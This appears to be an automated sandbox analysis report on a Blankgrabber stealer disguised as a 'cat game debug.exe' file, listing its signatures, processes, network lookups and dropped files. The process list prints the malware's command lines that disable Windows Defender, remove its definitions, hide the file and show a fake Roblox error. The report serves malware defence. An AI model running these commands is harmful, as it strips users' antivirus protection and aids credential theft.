Analysis Overview
SHA256
dcb845da0cc3c03c4d2b54792413144131cc183228905ff583527815ed5c6095
Threat Level: Known bad
The file cat game debug.exe was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
Deletes Windows Defender Definitions
A stealer written in Python and packaged with Pyinstaller
Command and Scripting Interpreter: PowerShell
UPX packed file
Loads dropped DLL
Views/modifies file attributes
Detects videocard installed
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-17 18:09
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-uewyi.in | udp |
| US | 8.8.8.8:53 | blank-uewyi.in | udp |
| US | 8.8.8.8:53 | blank-uewyi.in | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI45842\python310.dll
| MD5 | 4a6afa2200b1918c413d511c5a3c041c |
| SHA1 | 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3 |
| SHA256 | bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da |
| SHA512 | dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/1652-25-0x00007FF9F9260000-0x00007FF9F96C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI45842\base_library.zip
| MD5 | 483d9675ef53a13327e7dfc7d09f23fe |
| SHA1 | 2378f1db6292cd8dc4ad95763a42ad49aeb11337 |
| SHA256 | 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e |
| SHA512 | f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_ctypes.pyd
| MD5 | 31859b9a99a29127c4236968b87dbcbb |
| SHA1 | 29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5 |
| SHA256 | 644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713 |
| SHA512 | fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
memory/1652-48-0x00007FFA0E350000-0x00007FFA0E35F000-memory.dmp
memory/1652-47-0x00007FFA0BFF0000-0x00007FFA0C014000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_ssl.pyd
| MD5 | 9a7ab96204e505c760921b98e259a572 |
| SHA1 | 39226c222d3c439a03eac8f72b527a7704124a87 |
| SHA256 | cae09bbbb12aa339fd9226698e7c7f003a26a95390c7dc3a2d71a1e540508644 |
| SHA512 | 0f5f58fb47379b829ee70c631b3e107cde6a69dc64e4c993fb281f2d5ada926405ce29ea8b1f4f87ed14610e18133932c7273a1aa209a0394cc6332f2aba7e58 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_sqlite3.pyd
| MD5 | 70a7050387359a0fab75b042256b371f |
| SHA1 | 5ffc6dfbaddb6829b1bfd478effb4917d42dff85 |
| SHA256 | e168a1e229f57248253ead19f60802b25dc0dbc717c9776e157b8878d2ca4f3d |
| SHA512 | 154fd26d4ca1e6a85e3b84ce9794a9d1ef6957c3bba280d666686a0f14aa571aaec20baa0e869a78d4669f1f28ea333c0e9e4d3ecd51b25d34e46a0ef74ee735 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_socket.pyd
| MD5 | 49f87aec74fea76792972022f6715c4d |
| SHA1 | ed1402bb0c80b36956ec9baf750b96c7593911bd |
| SHA256 | 5d8c8186df42633679d6236c1febf93db26405c1706f9b5d767feab440ea38b0 |
| SHA512 | de58d69228395827547e07695f70ef98cdaf041ebaae0c3686246209254f0336a589b58d44b7776ccae24a5bc03b9dc8354c768170b1771855f342eecc5fead4 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_queue.pyd
| MD5 | bebc7743e8af7a812908fcb4cdd39168 |
| SHA1 | 00e9056e76c3f9b2a9baba683eaa52ecfa367edb |
| SHA256 | cc275b2b053410c6391339149baf5b58df121a915d18b889f184be02bedaf9bc |
| SHA512 | c56496c6396b8c3ec5ec52542061b2146ea80d986dfe13b0d4feb7b5953c80663e34ccd7b7ee99c4344352492be93f7d31f7830ec9ec2ca8a0c2055cb18fa8db |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_lzma.pyd
| MD5 | 864b22495372fa4d8b18e1c535962ae2 |
| SHA1 | 8cfaee73b7690b9731303199e3ed187b1c046a85 |
| SHA256 | fc57bd20b6b128afa5faaac1fd0ce783031faaf39f71b58c9cacf87a16f3325f |
| SHA512 | 9f26fe88aca42c80eb39153708b2315a4154204fc423ca474860072dd68ccc00b7081e8adb87ef9a26b9f64cd2f4334f64bc2f732cd47e3f44f6cf9cc16fa187 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_hashlib.pyd
| MD5 | 659a5efa39a45c204ada71e1660a7226 |
| SHA1 | 1a347593fca4f914cfc4231dc5f163ae6f6e9ce0 |
| SHA256 | b16c0cc3baa67246d8f44138c6105d66538e54d0afb999f446cae58ac83ef078 |
| SHA512 | 386626b3bad58b450b8b97c6ba51ce87378cddf7f574326625a03c239aa83c33f4d824d3b8856715f413cfb9238d23f802f598084dbd8c73c8f6c61275fdecb5 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_decimal.pyd
| MD5 | 7cdc590ac9b4ffa52c8223823b648e5c |
| SHA1 | c8d9233acbff981d96c27f188fcde0e98cdcb27c |
| SHA256 | f281bd8219b4b0655e9c3a5516fe0b36e44c28b0ac9170028dd052ca234c357c |
| SHA512 | 919c36be05f5f94ec84e68ecca43c7d43acb8137a043cf429a9e995643ca69c4c101775955e36c15f844f64fc303999da0cbfe5e121eb5b3ffb7d70e3cd08e0b |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\_bz2.pyd
| MD5 | fba120a94a072459011133da3a989db2 |
| SHA1 | 6568b3e9e993c7e993a699505339bbebb5db6fb0 |
| SHA256 | 055a93c8b127dc840ac40ca70d4b0246ac88c9cde1ef99267bbe904086e0b7d3 |
| SHA512 | 221b5a2a9de1133e2866b39f493a822060d3fb85f8c844c116f64878b9b112e8085e61d450053d859a63450d1292c13bd7ec38b89fe2dfa6684ac94e090ec3aa |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\unicodedata.pyd
| MD5 | c697dc94bdf07a57d84c7c3aa96a2991 |
| SHA1 | 641106acd3f51e6db1d51aa2e4d4e79cf71dc1ab |
| SHA256 | 58605600fdaafbc0052a4c1eb92f68005307554cf5ad04c226c320a1c14f789e |
| SHA512 | 4f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\sqlite3.dll
| MD5 | 0c4996047b6efda770b03f8f231e39b8 |
| SHA1 | dffcabcd4e950cc8ee94c313f1a59e3021a0ad48 |
| SHA256 | 983f31bc687e0537d6028a9a65f4825cc560bbf3cb3eb0d3c0fcc2238219b5ed |
| SHA512 | 112773b83b5b4b71007f2668b0344bf45db03bbe1f97ae738615f3c4e2f8afb54b3ae095ea1131bf858ddfb1e585389658af5db56561609a154ae6bb80dc79ba |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\select.pyd
| MD5 | b6de7c98e66bde6ecffbf0a1397a6b90 |
| SHA1 | 63823ef106e8fd9ea69af01d8fe474230596c882 |
| SHA256 | 84b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c |
| SHA512 | 1fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\libssl-1_1.dll
| MD5 | ad0a2b4286a43a0ef05f452667e656db |
| SHA1 | a8835ca75768b5756aa2445ca33b16e18ceacb77 |
| SHA256 | 2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1 |
| SHA512 | cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\libcrypto-1_1.dll
| MD5 | bbc1fcb5792f226c82e3e958948cb3c3 |
| SHA1 | 4d25857bcf0651d90725d4fb8db03ccada6540c3 |
| SHA256 | 9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47 |
| SHA512 | 3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d |
C:\Users\Admin\AppData\Local\Temp\_MEI45842\blank.aes
| MD5 | 705023b823cb30d35ab5f90488394f37 |
| SHA1 | 61d5de747c068c2c35132c74ad9eb2e084f60ffd |
| SHA256 | 67286f4a3d187836bc1cac1aa3997973d3fa2fa797d84167c1822673efe6c30a |
| SHA512 | 86f3b758e7a82b60a52f028930ea1da939f6f03f9f8c88c9a42412e3422b4b7e07d1b460eb189a38a90ae5d283b70ebae0c3b0e5f4d62f57f2d8a2212683376b |
memory/1652-54-0x00007FFA08BC0000-0x00007FFA08BEC000-memory.dmp
memory/1652-56-0x00007FFA0C050000-0x00007FFA0C068000-memory.dmp
memory/1652-58-0x00007FFA0BFD0000-0x00007FFA0BFEF000-memory.dmp
memory/1652-60-0x00007FFA086A0000-0x00007FFA0881A000-memory.dmp
memory/1652-62-0x00007FFA0BF00000-0x00007FFA0BF19000-memory.dmp
memory/1652-65-0x00007FFA09590000-0x00007FFA0959D000-memory.dmp
memory/1652-66-0x00007FFA08B90000-0x00007FFA08BBE000-memory.dmp
memory/1652-71-0x000001588F9C0000-0x000001588FD39000-memory.dmp
memory/1652-73-0x00007FF9F9260000-0x00007FF9F96C6000-memory.dmp
memory/1652-72-0x00007FFA08AD0000-0x00007FFA08B88000-memory.dmp
memory/1652-70-0x00007FF9F8EE0000-0x00007FF9F9259000-memory.dmp
memory/1652-77-0x00007FFA09580000-0x00007FFA0958D000-memory.dmp
memory/1652-76-0x00007FFA08AB0000-0x00007FFA08AC5000-memory.dmp
memory/1652-80-0x00007FFA082B0000-0x00007FFA083C8000-memory.dmp
memory/1652-79-0x00007FFA0BFF0000-0x00007FFA0C014000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vm215t0i.fpz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4684-90-0x000001BBC61D0000-0x000001BBC61F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1652-106-0x00007FFA0BFD0000-0x00007FFA0BFEF000-memory.dmp
memory/1652-107-0x00007FFA086A0000-0x00007FFA0881A000-memory.dmp
memory/1652-109-0x00007FFA0BFF0000-0x00007FFA0C014000-memory.dmp
memory/1652-118-0x00007FFA08AD0000-0x00007FFA08B88000-memory.dmp
memory/1652-119-0x00007FF9F8EE0000-0x00007FF9F9259000-memory.dmp
memory/1652-117-0x00007FFA08B90000-0x00007FFA08BBE000-memory.dmp
memory/1652-115-0x00007FFA0BF00000-0x00007FFA0BF19000-memory.dmp
memory/1652-108-0x00007FF9F9260000-0x00007FF9F96C6000-memory.dmp
memory/1652-123-0x000001588F9C0000-0x000001588FD39000-memory.dmp
memory/1652-124-0x00007FF9F9260000-0x00007FF9F96C6000-memory.dmp
memory/1652-139-0x00007FF9F9260000-0x00007FF9F96C6000-memory.dmp
memory/1652-154-0x00007FF9F9260000-0x00007FF9F96C6000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win11-20240508-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
